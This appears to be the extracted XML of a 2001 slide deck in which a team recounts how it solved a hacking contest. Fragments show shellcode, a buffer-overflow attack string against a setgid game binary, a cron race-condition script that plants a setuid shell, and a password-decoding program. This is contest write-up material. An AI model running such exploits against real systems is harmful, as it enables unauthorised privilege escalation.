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B8C-D6B9-4A7C-8E59-90559EAF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E11-EF8E-4155-98BB-8B626AD8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9DA-D36B-4E48-B49B-E8A9DF9C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DDA-64D5-4E79-AC1E-71F332F1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19BC-16B9-45AD-BE86-C132B947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EF5-A6B8-4807-96AD-BC4A154F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2D5-5DD7-48C5-992E-30BFE537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009-99A2-4BF4-A11E-BAFB0ECB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458-157E-4089-A34F-DC6E1CCD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5B4-075C-4FC8-932D-EBF9B9F4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46A-FC34-466A-A5E2-A9D49E8D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0CB-372C-4BB4-9A89-4A2945C4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1AA5-391B-4F9A-A789-A92DA9062BE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icken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24852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휴먼매직체"/>
              </a:rPr>
              <a:t>King Of Fighters 2001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3828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굴림"/>
              </a:rPr>
              <a:t>The Best of Best HackerGroup Null@Roo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148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2 (continu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Finding Vulnerabilit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/usr/games directory File lis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drwxrwxr-x    3  root     level2     352256 Aug 25 17:50 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drwxr-xr-x   19  root     root          4096 Aug 23 22:38 .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000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff3399"/>
                </a:solidFill>
                <a:latin typeface="굴림"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>-rw-rw---- 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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ko-KR" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff3399"/>
                </a:solidFill>
                <a:latin typeface="굴림"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>  level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 level2          98 Aug 25 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ko-KR" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff3399"/>
                </a:solidFill>
                <a:latin typeface="굴림"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>17:5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che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-rw-r--r--    1  level2   level2        763 Aug 25 17:50 sco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-rw-r-----   1  h3579  level2            0 Aug 25 17:50 score.1321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-rwxr-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ko-KR" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff3399"/>
                </a:solidFill>
                <a:latin typeface="굴림"/>
                <a:ea typeface="굴림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r-x     1  root     </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ko-KR" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff3399"/>
                </a:solidFill>
                <a:latin typeface="굴림"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>level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   17542 Aug 25 06:20 solvei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 9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156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2 (continu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-15228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Solveit work like this :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Input ID : (input id --- upto 129byte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123+456)*789-(456+123)*789 = (Input Result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nn1+nn2)*nn3-(nn5+nn5)*nn6 = (Input Result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Do you play again(y/n)? (Input Data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641640" y="2971800"/>
            <a:ext cx="190440" cy="838080"/>
            <a:chOff x="6641640" y="2971800"/>
            <a:chExt cx="190440" cy="838080"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="161" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6641640" y="29718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641640" y="38098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32080" y="2971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88356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20tim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10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169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2 (continu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727280"/>
            <a:ext cx="86612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nformation from Solveit binary fi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ID Field input length : upto 129byte, start at ebp + 0xffffff78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0x8048d0d &lt;main+157&gt;:   push   $0x8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0x8048d12 &lt;main+162&gt;:   lea    0xffffff78(%ebp),%eax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0x8048d18 &lt;main+168&gt;:   push   %eax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0x8048d19 &lt;main+169&gt;:   push   $0x804900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0x8048d1e &lt;main+174&gt;:   call   0x8048854 &lt;get_input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(gdb) x/bs 0x804900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0x8049005 &lt;_IO_stdin_used+225&gt;:  "Input your id: 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061040" y="287028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7061040" y="317484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7645320" y="2819520"/>
            <a:ext cx="838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굴림"/>
              </a:rPr>
              <a:t>Length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3130560"/>
            <a:ext cx="1523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굴림"/>
              </a:rPr>
              <a:t>start position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11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181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2 (continu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-152280" y="182880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Last guestion input length is affected by ID Field’s last byte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0x8048db7 &lt;main+327&gt;:   mov    0xfffffff8(%ebp),%eax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0x8048dba &lt;main+330&gt;:   push   %eax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0x8048dbb &lt;main+331&gt;:   push   $0x804904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0x8048dc0 &lt;main+336&gt;:   call   0x80488c0 &lt;get_yn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0x8048dc5 &lt;main+341&gt;:   add    $0x8,%es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(gdb) x/bs 0x804904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0x8049042 &lt;_IO_stdin_used+286&gt;:  "Do you play again? (y/n) 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2590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946560" y="2514600"/>
            <a:ext cx="190440" cy="380880"/>
            <a:chOff x="6946560" y="2514600"/>
            <a:chExt cx="190440" cy="380880"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="187" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6946560" y="25146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46560" y="28954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370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175520" y="27496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get_yn’s length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12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195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2 (continu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-152280" y="1295280"/>
            <a:ext cx="83818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Function get_yn use 4byte sta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Dump of assembler code for function get_y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0x80488c0 &lt;get_yn&gt;:     push   %eb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0x80488c1 &lt;get_yn+1&gt;:   mov    %esp,%eb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0x80488c3 &lt;get_yn+3&gt;:   sub    $0x4,%es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0x80488c6 &lt;get_yn+6&gt;:   push   $0x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0x80488c8 &lt;get_yn+8&gt;:   push   $0x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0x80488ca &lt;get_yn+10&gt;:  lea    0xfffffffc(%ebp),%ea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0x80488cd &lt;get_yn+13&gt;:  push   %ea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0x80488ce &lt;get_yn+14&gt;:  call   0x8048730 &lt;memset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0x80488d3 &lt;get_yn+19&gt;:  add    $0xc,%es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0x80488d6 &lt;get_yn+22&gt;:  mov    0xc(%ebp),%ea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0x80488d9 &lt;get_yn+25&gt;:  push   %ea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0x80488da &lt;get_yn+26&gt;:  lea    0xfffffffc(%ebp),%ea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0x80488dd &lt;get_yn+29&gt;:  push   %ea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0x80488de &lt;get_yn+30&gt;:  mov    0x8(%ebp),%ea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0x80488e1 &lt;get_yn+33&gt;:  push   %ea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0x80488e2 &lt;get_yn+34&gt;:  call   0x8048854 &lt;get_input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590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25146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get_yn’s stuck (4byt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13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205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2 (continu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1905120"/>
            <a:ext cx="8915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TTACK for level2’s gid shel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Modify setreuid shell code to setregid shell co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0" lang="ko-KR" sz="1500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="굴림"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>( setreuid(0,0) -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ko-KR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500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="굴림"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t> setregid(501,501) )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ff3399"/>
                </a:solidFill>
                <a:latin typeface="굴림"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ko-KR" sz="1500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="굴림"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>\x31\xdb\x31\xc9\xf7\xe3</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ko-KR" sz="1500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff3399"/>
                </a:solidFill>
                <a:latin typeface="굴림"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>\x66\x81\xc3\xf5\x01\x66\x81\xc1\xf5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0" lang="ko-KR" sz="1500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff3399"/>
                </a:solidFill>
                <a:latin typeface="굴림"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>\x01</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ko-KR" sz="1500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="굴림"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>\xb0\x47\xcd\x80\x31\xdb\x31\xc9\x53\x68\x6e\x2f\x73\x68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0" lang="ko-KR" sz="1500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="굴림"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80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Attack string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0" lang="ko-KR" sz="1500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="굴림"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>[Nop+setregid shell+Nop]+[math quiz answer]+[AAAA][ebp][return Address]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     </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ko-KR" sz="1500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="굴림"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>129byte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14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213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2 (continu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-203040" y="1523880"/>
            <a:ext cx="9753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Attack str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(printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90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\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90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\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90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\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x31\xc9\xf7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\xe3\x66\x81\xc3\xf5\x01\x66\x81\xc1\xf5\x01\xb0\x47\xcd\x80\x31\xdb\x31\xc9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\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b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\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x34\x37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\x32\x33\x32\x0a\x39\x37\x34\x37\x35\x0a\x35\x31\x30\x30\x33\x0a\x36\x38\x32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\x32\x30\x0a\x38\x34\x34\x34\x35\x0a\x34\x32\x33\x30\x31\x0a\x34\x34\x39\x35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\x32\x0a\x35\x34\x38\x34\x30\x0a\x37\x35\x31\x31\x30\x0a\x34\x34\x37\x36\x38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\x0a\x31\x33\x30\x39\x32\x32\x0a\x34\x32\x36\x37\x36\x0a\x31\x32\x30\x37\x32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\x30\x0a\x36\x30\x34\x35\x36\x0a\x31\x31\x31\x39\x35\x31\x0a\x31\x30\x36\x38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\x31\x36\x0a\x35\x33\x31\x33\x33\x0a\x38\x35\x31\x38\x31\x0a\x39\x39\x32\x39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\x37\x0a\x38\x32\x34\x35\x37\x0a\x41\x41\x41\x41\x58\xfb\xff\xbf\x40\xfc\xff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  <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>\xbf\x0a"; cat)|./solveit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15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221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2 (continu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79360" y="137160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we could modify main.html of level2 with level2 gid priviledge, but the “Target” need level2 uid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Finding other Vulnerabilit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/us2/games/cheek file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sh-2.04$ cat che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for file in /usr/games/score.* ; do /bin/cat $file &gt;&gt; /usr/games/score ; /bin/rm -f $file ; don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level2’s Cron Job do like this :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rm che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make che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do check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16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229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2 (continu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37160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TTACK for level2’s uid shel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var/spool/cron/crontabs/level2 had race condition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2590920"/>
            <a:ext cx="3352680" cy="33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Cr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rm check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make check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do check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31892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4078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506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525456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0292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replace check file (include myjob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17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2666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at every 10 min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244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2 (continu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76320" y="1506600"/>
            <a:ext cx="9219960" cy="45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Prepared setreuid shell(binary file : /tmp/ws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main(){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setreuid(501,501)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system(“bin/sh”)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Attack script (filename: exp.s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echo &gt; /usr/games/check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cp /tmp/wsh /tmp/nullroot; chmod 4755 /tmp/nullroo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./exp.sh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18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46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049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Environment :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Zolazola.exe : P2P Communication Progra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arget :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http://kof.hackerslab.org/cgi-bin/level1/idaccess.cgi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3012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1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66135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 1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252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2 (complet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066680"/>
            <a:ext cx="861048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ongraturation!, You passed level 2. Now challenge level 3 system !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level3 system's IP adress is 203.255.xxx.xxx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Make your page in /usr/local/apache/htdocs/main.htm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귀하의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D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와 패스워드를 가지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level3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버에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elnet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 접속이 가능합니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level3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시스템의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root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권한을 획득한 후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level3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버내의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daccess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라는 프로그램을 실행시키시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Now challenge level 3 system !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You can connect level 3 system's telnet service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by using your "Registration Number" and password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You must get a root privilege, and find a excutable file "idaccess" in any location in level 3 syste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After that, if you excute "idaccess" and input your registration inform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hen you will get qualification for passing level 3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19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260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3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Environment :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Server: Solaris 5.8 i386(203.255.xxx.xxx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GCC: 2.9x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arget :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4191120" y="66135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20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268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3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066680"/>
            <a:ext cx="86104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1. Checking vulnerabil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1.1 search known bu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1.2 port sc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1.3 search setuid root fi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1.4 boot sequence che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2. Found login problem ( 202byte login ID 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attack string forma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[ serial_no(13) + nop(95)+ shell code(93)+return address(4)]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3. we had not enough time to exploit it, so give up level3.. And defence level2’s homepag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66135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21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276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&lt;After-talk of KOF&gt;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990720"/>
            <a:ext cx="86104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we worried about p2p on the eve of that game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level2 was not so easy to solve directly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there were no special priviledges to keep main.html of level2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player need some attention for their work, script kiddies copied solveit's exploit from /tmp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Anybody can get level2's uid by peeking /usr/games/check file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level3 was difficult to us because we didn't have so much experience Solaris.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we thought all of levels were very nice , thanks to hackerslab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4191120" y="66135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22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54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1 (continu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Finding Vulnerabilit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String from zolazola Executable Fi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ID : gues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Password : gZuOeLs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Packet sniffin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Server : 203.239.xxx.xxx : 29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Command lis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KOFLOG, KOFGETLIST, KOFMESSAGE, KOFGET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KOFOK, KOFFRI, KOFPUTERR KOFPUT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 2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62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1 (continu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638360" y="1549440"/>
            <a:ext cx="5207040" cy="668520"/>
            <a:chOff x="1638360" y="1549440"/>
            <a:chExt cx="5207040" cy="668520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1638360" y="181908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KOFLOG guest dXtOfNuEy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78320" y="18954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40280" y="1549440"/>
              <a:ext cx="19051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790640" y="2981160"/>
            <a:ext cx="4267080" cy="398880"/>
            <a:chOff x="1790640" y="2981160"/>
            <a:chExt cx="4267080" cy="398880"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1790640" y="2981160"/>
              <a:ext cx="32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KOFGTLIST guest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05040" y="30574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111120" y="2387520"/>
            <a:ext cx="3352680" cy="398880"/>
            <a:chOff x="3111120" y="2387520"/>
            <a:chExt cx="3352680" cy="398880"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3720960" y="238752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KOFOK 0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1120" y="24508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111120" y="5664240"/>
            <a:ext cx="3886560" cy="398880"/>
            <a:chOff x="3111120" y="5664240"/>
            <a:chExt cx="3886560" cy="398880"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="76" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3340080" y="566424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KOFPUTERR level1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3111120" y="57402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806560" y="3635280"/>
            <a:ext cx="4191120" cy="618120"/>
            <a:chOff x="2806560" y="3635280"/>
            <a:chExt cx="4191120" cy="618120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="79" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2806560" y="3669840"/>
              <a:ext cx="419112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KOFFRI level1 ROFFRI level2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lvl="1" marL="457200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 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KOFFRI  guest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111120" y="36352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663560" y="4340160"/>
            <a:ext cx="5334120" cy="703800"/>
            <a:chOff x="1663560" y="4340160"/>
            <a:chExt cx="5334120" cy="703800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="82" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1663560" y="4340160"/>
              <a:ext cx="5334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KOFMSG guest level1 Hi! are you there?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65360" y="44164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663560" y="4978440"/>
            <a:ext cx="5486400" cy="398880"/>
            <a:chOff x="1663560" y="4978440"/>
            <a:chExt cx="5486400" cy="398880"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="85" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1663560" y="497844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KOFGETINFO guest level1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77960" y="50547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0880" y="2984400"/>
            <a:ext cx="1752840" cy="1295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ent P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2984400"/>
            <a:ext cx="1752840" cy="1295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 3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93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1 (continu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43080" y="1511280"/>
            <a:ext cx="87627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TTACK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telnet 203.255.xxx.xxx 29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KOFGETINFO gest guest (I want guest’s information.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KOFPUTINFO guest eYuPgOwFz       gZuOeLsA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KOFGETLIST level2 (Who is level2’s friend?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KOFFRI kof_moni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KOFGETINFO kof_moniter level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KOFPUTINFO level2 eDttvdvYQVn level2@kof.hackerslab.org level2us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KOFPUTINFO level2 fEuuwewZRWo level2@kof.hackerslab.org level2us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KOFPUTINFO level2 gFvvxfx[SXp level2@kof.hackerslab.org level2us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KOFPUTINFO level2 eDttvdvYQVn level2@kof.hackerslab.org level2us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622760" y="3174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 4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102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1 (continu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2193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447920"/>
            <a:ext cx="396252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ENCOD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g  Z  u  O  e  L  x  A  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E  Y  u  P  g  O  w  F  z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-2  –1    0  +1  +2   +3  +4   +5  +6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2133720"/>
            <a:ext cx="3886200" cy="31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g  Z  u  O  e  L  x  A  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d  X  t  O  f  N  u  E  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-3   –2  -1   0  +1  +2  +3  +4  +5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714680" y="3276720"/>
            <a:ext cx="1054080" cy="990360"/>
            <a:chOff x="1714680" y="3276720"/>
            <a:chExt cx="1054080" cy="990360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="109" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="210816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0816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14680" y="3581280"/>
              <a:ext cx="105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Encod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956200" y="3276720"/>
            <a:ext cx="1054080" cy="990360"/>
            <a:chOff x="5956200" y="3276720"/>
            <a:chExt cx="1054080" cy="990360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="113" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="634968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4968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56200" y="3581280"/>
              <a:ext cx="105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Encod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 5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null2root_색연하게2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848360" cy="4152960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="119" name="null2root_색연하게2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6676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DECOD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main(int argc, char **argv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nt     i, j, start, stop, dy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nt     src_len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har    *src, ch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rc = argv[1]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rc_len = strlen(src)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or(i = 0; i &lt; src_len; i++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or(j = 0, dy = i; j &lt; src_len; j++, dy--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h = *(src + j)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printf("%c", ch + dy)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printf("\n")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}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122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1 (continu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5054760" y="1295280"/>
            <a:ext cx="2984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$ ./dec1 eDttvdvYQV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eCrqr_pRIM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Dsrs`qSJN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3333cc"/>
                </a:solidFill>
                <a:latin typeface="굴림"/>
              </a:rPr>
              <a:t>gEtstarTKO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hFutubsULP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GvuvctVMQh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jHwvwduWNRi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kIxwxevXOSj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lJyxyfwYPTk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mKzyzgxZQU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nL{z{hy[RV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oM|{|iz\SW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pN}|}j{]TXo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2978280"/>
            <a:ext cx="368280" cy="260280"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 353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959520" y="294624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level2’s passwor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 6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132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1 (complet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927000" y="2624040"/>
            <a:ext cx="7315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Conguratulations!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he IP for the next level is 203.255.xxx.xxx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nd ID is h3047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 7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null2root_색연하게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79360" y="266760"/>
            <a:ext cx="8610120" cy="6324120"/>
            <a:chOff x="279360" y="266760"/>
            <a:chExt cx="8610120" cy="6324120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="140" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="279360" y="1019520"/>
              <a:ext cx="8610120" cy="5571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9360" y="266760"/>
              <a:ext cx="8610120" cy="752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85800" y="3430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Level 2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Server :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Linux kernel 2.4.9 (203.255.xxx.xxx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GCC:egcs-2.91.66 199990314/Linux(egcs-        1.1.2 release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arget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/usr/local/apache/cgi-bin/idaccess.cgi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664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 8 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807732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1/09/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1:40:34Z</dcterms:created>
  <dc:creator>정호영</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>양정규</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2001-09-03T00:47:42Z</dcterms:modified>
  <cp:revision>44</cp:revision>
  <dc:subject/>
  <dc:title>King Of Fighters 2001</dc:title>
</cp:coreProperties>
</file>